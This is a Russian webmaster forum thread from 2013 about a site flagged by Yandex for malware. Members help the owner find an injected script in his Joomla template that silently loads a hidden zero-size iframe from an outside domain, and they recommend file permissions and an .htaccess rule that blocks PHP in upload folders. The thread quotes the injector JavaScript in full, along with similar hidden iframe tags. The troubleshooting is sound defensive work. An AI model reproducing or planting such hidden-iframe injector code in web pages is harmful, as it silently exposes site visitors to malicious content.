Яндекс нашел вирус на сайте

M
На сайте с 14.08.2012
Offline
51
42008

Здравствуйте, уважаемые участники форума!

сегодня 06.08.13 при попытке захода на сайт http://elektri4estwo.ru выдается предупреждение о том, что сайт может угрожать безопасности компьютера. В панели яндекс вебмастер написано следующее:

Результат выборочной проверки

Дата последней проверки 06.08.2013

Страница http://elektri4estwo.ru/osnovi-elektrotehniki/1-peremennii-i-postoyannii-tok.html

Вердикт Поведенческий анализ.

Я проверил все файлы сайта, вирусы отсутствуют. Также обратился с просьбой в службу поддержки хостера, вирусов нет.

1. Подскажите в чем заключается вердикт "поведенческий анализ"?

2. Какой вредоносный код на сайте все таки есть? Повторная проверка яндекс показала что код все еще присутствует. Тех поддержка пока молчит.

3. Подскажите где дырка в сайте? Почитал рекомендации в теме "Общая тема о борьбе с шеллами и вирусами на сайте", когда их применять после удаления вредоносного кода?

TF-Studio
На сайте с 17.08.2010
Offline
334
#1

Фрейм у вас с вирусом.

<iframe name="if9KRu" src="http://***.la*tye.com/" style="width: 0px; height: 0px;">



---------- Добавлено 06.08.2013 в 18:02 ----------

На 245 +- строчке - это ваш код?

<script type="text/javascript">(function(){var j=143591,f=false,b=document,c итд
Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
M
На сайте с 14.08.2012
Offline
51
#2
TF-Studio:
Фрейм у вас с вирусом.


---------- Добавлено 06.08.2013 в 18:02 ----------

а где этот фрейм найти?

На 245 +- строчке - это ваш код?

это код партнерки ред клик

нашел код

var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://*.la*tye.com/';if9KRu.style.width = '0px';if9KRu.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if9KRu=') == -1) {document.cookie = 'if9KRu=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if9KRu);}};

это он?

U1
На сайте с 20.08.2010
Offline
67
#3
Maksiim:
это код партнерки ред клик

тоже на эту партнерку яша матерился - убрал...

M
На сайте с 14.08.2012
Offline
51
#4
ugu123:
тоже на эту партнерку яша матерился - убрал...

это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?

кроме удаления партнерки ни как не исправить?

---------- Добавлено 06.08.2013 в 17:10 ----------

TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?

U1
На сайте с 20.08.2010
Offline
67
#5
Maksiim:
это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?
кроме удаления партнерки ни как не исправить?

---------- Добавлено 06.08.2013 в 17:10 ----------

TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?

после ее удаления все стало хорошо

M
На сайте с 14.08.2012
Offline
51
#6

не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?

E
На сайте с 09.01.2008
Offline
61
#7
Maksiim:
не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?

вообще рекомендуется, не только на джулу\не джумлу - на папки 755 на файлы 644 (которые используются и выполняются)

M
На сайте с 14.08.2012
Offline
51
#8
Exquisitor:
вообще рекомендуется, не только на джулу\не джумлу - на папки 755 на файлы 644 (которые используются и выполняются)

спасибо, все также стоят. Можете объяснить как реализовать следующее:

"все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает

deny from all

либо запрещает вызов php

Options -Indexes

php_flag engine 0

RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml

AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml "

NM
На сайте с 18.02.2011
Online
181
#9

Такая же фигня сегодня с яндексом.

На сайте только тизеры от adlabs.

Посмотрите сайт xodbox.ru От кода партнерки такая шняга? Почему тогда за полтора года ни разу не было с ней проблем?

https://clck.ru/37jxNm пытаюсь здесь отбить просадку в РСЯ Распродажа сайтов https://docs.google.com/spreadsheets/d/1m63GJQUZMrrhTxT2aoAQBX_722Kte2PfvTQEON_SgGE/
medik777
На сайте с 29.07.2012
Offline
15
#10

у меня тоже такой фрейм(

<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>

в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий